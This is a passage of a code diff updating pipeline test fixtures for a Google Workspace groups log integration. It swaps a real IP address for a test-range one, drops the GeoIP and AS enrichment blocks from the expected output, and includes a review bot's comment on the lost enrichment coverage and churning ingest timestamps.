+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
diff --git a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json
index 63cd5fc6d1b..0f63c344638 100644
--- a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json
+++ b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json
@@ -2,31 +2,13 @@
 "expected": [
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -40,7 +22,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
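Review bot: The regenerated expectation no longer contains any `source.geo` or `source.as` block for the new address, so the pipeline's GeoIP/AS enrichment is no longer asserted by this test; the old fixture covered it (even if against an unsuitable real-world IP). If the move to the supported test IP range was meant to keep that enrichment deterministic, the file looks like it was regenerated without the test GeoIP database active, so please confirm which it is before merging. The same removal repeats in every `-…,31 +…,13` hunk through the last one on this page. Separately, `event.ingested` is rewritten in every 8-line hunk (first at `@@ -70,8 +52,8 @@`); if it is not already listed under the test config's `dynamic_fields`, adding it there would stop this churn on every regeneration.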
@@ -70,8 +52,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728236600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}",
+ "ingested": "2021-12-09T13:39:12.286029Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}",
 "provider": "groups",
 "action": "change_acl_permission",
 "id": "1",
@@ -101,31 +83,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -139,7 +103,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -161,8 +125,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728241700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286032300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "provider": "groups",
 "action": "accept_invitation",
 "id": "1",
@@ -193,31 +157,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -232,7 +178,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -257,8 +203,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728243400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286037800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "provider": "groups",
 "action": "approve_join_request",
 "id": "1",
@@ -292,31 +238,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -330,7 +258,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -352,8 +280,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728245Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286042300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "provider": "groups",
 "action": "join",
 "id": "1",
@@ -384,31 +312,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -422,7 +332,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -444,8 +354,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728246500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286046800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "provider": "groups",
 "action": "request_to_join",
 "id": "1",
@@ -476,31 +386,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -514,7 +406,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -539,8 +431,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728248Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286052100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}",
 "provider": "groups",
 "action": "change_basic_setting",
 "id": "1",
@@ -571,31 +463,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -609,7 +483,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -631,8 +505,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728249400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286057300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "provider": "groups",
 "action": "create_group",
 "id": "1",
@@ -662,31 +536,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -700,7 +556,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -722,8 +578,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728251Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "ingested": "2021-12-09T13:39:12.286062500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "provider": "groups",
 "action": "delete_group",
 "id": "1",
@@ -753,31 +609,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -791,7 +629,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -816,8 +654,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:29.728252500Z",
